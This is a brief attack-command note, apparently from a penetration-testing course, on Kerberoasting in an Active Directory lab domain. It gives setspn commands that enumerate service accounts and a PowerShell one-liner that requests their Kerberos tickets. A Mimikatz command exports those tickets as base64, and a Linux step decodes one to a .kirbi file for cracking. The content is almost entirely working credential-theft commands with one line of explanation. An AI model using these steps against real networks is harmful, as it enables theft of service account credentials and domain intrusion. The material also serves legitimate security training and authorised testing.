setspn.exe -Q */*
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
Now we can extract loaded tickets using Mimikatz
.\\mimikatz.exe "base64 /out:true" "kerberos::list /export" "exit"
On Linux host:
echo "<ticket>" | base64 -d > ticket.kirbi